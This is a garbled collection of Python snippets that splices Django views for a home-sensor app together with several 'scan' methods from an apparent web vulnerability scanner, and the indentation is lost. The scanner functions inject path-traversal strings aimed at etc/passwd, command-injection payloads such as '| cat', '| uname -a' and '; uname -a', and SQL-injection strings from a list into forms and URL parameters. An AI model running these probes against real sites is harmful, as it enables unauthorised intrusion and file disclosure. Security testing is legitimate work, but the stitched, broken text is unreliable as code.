def new_group(request):
if request.method == 'POST':
form = GroupForm(request.POST)
if form.is_valid():
group_code = helper.post_request("https://a6.cfapps.io/groups", {})
groupID = json.loads(group_code)['groupId']
group = Group.objects.create(code=groupID, name=form.cleaned_data['name'])
group.save()
#Create a new subscription for group
url = "https://a6.cfapps.io/subscriptions"
payload = {}
payload['groupId'] = group.code
payload['insights'] = [
"home.window.open",
"home.window.closed",
"home.garage.open",
"home.garage.closed",
"home.smoke.alarm_on",
"home.smoke.alarm_off",
"home.smoke.alarm_battery_low",
"home.fire.alarm_on",
"home.fire.alarm_off",
"home.water.sensor.alarm_on",
"home.water.sensor.alarm_off",
"vehicle.trip.arrived",
"vehicle.health.arrived"]
payload['webhookUrl'] = 'https://homesensing.cfapps.io/callback'
result = helper.post_request(url, payload)
print result
return HttpResponseRedirect("/index")
else:
form = GroupForm()
return render_to_response('new_group.html', { 'form' : form }, context_instance=RequestContext(request))
def scan(self):
results = []
cache = []
for web_page in self.pages:
http = httplib2.Http()
status, response = http.request(web_page)
parsed = urlparse(web_page)
# handle scan for get params
if parsed.query:
# print("testing page: " + web_page)
payloads = self.prepare_params(parsed.query, 30, "etc/passwd")
for payload in payloads:
url = parsed.scheme + "://" + parsed.hostname + parsed.path + "?" + payload
new_status, new_response = http.request(url)
parsed_response = new_response.splitlines()
if new_status.status == requests.codes.ok:
#if int(new_status['content-length']) > int(status['content-length']):
if self.has_passwd_content(parsed_response):
# print("vulnerable url: " + url + "\n")
if not self.in_cache(cache, url):
results.append((urlparse(url).path, create_get_params(url), "GET"))
cache.append(url)
break
break
# handle scan for post php forms
if has_form(response):
forms = parse_form(response)
action = get_form_action(response)
if action != None:
web_page = web_page.rsplit('/', 1)[0] + "/" + action
original_response = post_request(web_page, forms)
injection_forms = []
paths = self.prepare_paths(30, "etc/passwd")
for path in paths:
for form_input in forms:
injection_forms.append((form_input[0], "| cat " + path))
new_response = post_request(web_page, injection_forms)
parsed_response = new_response.splitlines()
#if len(new_response) > len(original_response): # That means that the webpage is different, possibly a successful case
if self.has_passwd_content(parsed_response):
results.append((urlparse(web_page).path, create_post_params(injection_forms), "POST"))
break
self.logs = log_results(self.url, results, EXPLOIT_CLASS)
def scan(self):
results = []
get_param_pages = Set([])
for web_page in self.web_pages:
http = httplib2.Http()
status, response = http.request(web_page)
if has_form(response):
forms = parse_form(response)
original_response = post_request(web_page, forms)
injection_forms = []
for form_input in forms:
if form_input[
0] == "csrftoken": # We don't have incentive to change this
injection_forms.append(form_input)
else:
injection_forms.append((form_input[0], "| uname -a"))
new_response = post_request(web_page, injection_forms)
parsed_response = new_response.splitlines()
if self.has_uname_content(parsed_response):
results.append(
(urlparse(web_page).path,
create_post_params(injection_forms), "POST"))
elif has_get_params(web_page) and urlparse(
web_page).path not in get_param_pages:
parsed_web_page = urlparse(web_page)
get_param_pages.add(parsed_web_page.path)
param_list = map(lambda x: x.split("="),
parsed_web_page.query.split("&"))
# original_response = get_request(web_page)
# random_param_query = "?" + "&".join(map(lambda param: param[0] + "=" + urllib.quote("slkdfjsldk") ,param_list))
# random_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + random_param_query
# random_response = get_request(random_url)
malicious_params = []
for param in param_list:
malicious_params.append((param[0], "; uname -a"))
malicious_param_query = "?" + "&".join(
map(
lambda malicious_param: malicious_param[0] + "=" +
urllib.quote(malicious_param[1]), malicious_params))
malicious_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + malicious_param_query
malicious_response = get_request(malicious_url)
# if malicious_response != original_response and malicious_response != random_response: # That means that the webpage is different, possibly a successful case
if self.has_uname_content(malicious_response):
results.append((urlparse(web_page).path,
create_get_params(malicious_url), "GET"))
self.logs = log_results(self.url, results, EXPLOIT_CLASS)
def new_sensor(request, name):
group = Group.objects.get(name=name)
if request.method == 'POST':
form = SensorForm(request.POST)
if form.is_valid():
payload = {}
payload['sensorType'] = form.cleaned_data['sensorType']
payload['zipCode'] = form.cleaned_data['zipCode']
url = "https://a6.cfapps.io/groups/" + str(group.code) + "/sensors"
result = json.loads(helper.post_request(url, {}))
print result
s = Sensor.objects.create(group_id=group.id,
name=form.cleaned_data['name'],
sensorType=payload['sensorType'],
zipCode=payload['zipCode'],
code=result['sensorId'])
s.save()
return HttpResponseRedirect("/group/"+group.name)
else:
form = SensorForm()
return render_to_response('new_sensor.html', { 'form' : form, 'group_name': group.name }, context_instance=RequestContext(request))
def scan(self):
results = []
get_param_pages = Set([])
for web_page in self.pages:
http = httplib2.Http()
status, response = http.request(web_page)
if has_form(response):
forms = parse_form(response)
original_response = post_request(web_page, forms)
random_forms = []
for form_input in forms:
if form_input[
0] == "csrftoken": # We don't have incentive to change this
random_forms.append(form_input)
else:
random_forms.append((form_input[0], "absldkjf"))
random_response = post_request(web_page, random_forms)
sql_exploit_file = open(SQL_EXPLOIT_LIST, "r")
sql_exploit_list = [
x.strip() for x in sql_exploit_file.readlines()
]
for exploit in sql_exploit_list:
malicious_forms = []
for form_input in forms:
if form_input[
0] == "csrftoken": # We don't have incentive to change this
malicious_forms.append(form_input)
else:
malicious_forms.append((form_input[0], exploit))
new_response = post_request(web_page, malicious_forms)
if original_response != new_response and new_response != random_response: # That means that the webpage is different, possibly a successful case
results.append(
(urlparse(web_page).path,
create_post_params(malicious_forms), "POST"))
break
elif has_get_params(web_page) and urlparse(
web_page).path not in get_param_pages:
# GET version
parsed_web_page = urlparse(web_page)
get_param_pages.add(parsed_web_page.path)
param_list = map(lambda x: x.split("="),
parsed_web_page.query.split("&"))
original_response = get_request(web_page)
random_param_query = "?" + "&".join(
map(
lambda param: param[0] + "=" + urllib.quote(
"slkdfjsldk"), param_list))
random_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + random_param_query
random_response = get_request(random_url)
malicious_params = []
sql_exploit_file = open(SQL_EXPLOIT_LIST, "r")
sql_exploit_list = [
x.strip() for x in sql_exploit_file.readlines()
]
for exploit in sql_exploit_list:
malicious_params = []
for param in param_list:
malicious_params.append((param[0], exploit))
malicious_param_query = "?" + "&".join(
map(
lambda malicious_param: malicious_param[
0] + "=" + urllib.quote(malicious_param[1]),
malicious_params))
malicious_url = parsed_web_page.scheme + "://" + parsed_web_page.netloc + parsed_web_page.path + malicious_param_query
malicious_response = get_request(malicious_url)
if malicious_response != original_response and malicious_response != random_response: # That means that the webpage is different, possibly a successful case
results.append(
(urlparse(web_page).path,
create_get_params(malicious_url), "GET"))
self.logs = log_results(self.url, results, EXPLOIT_CLASS)
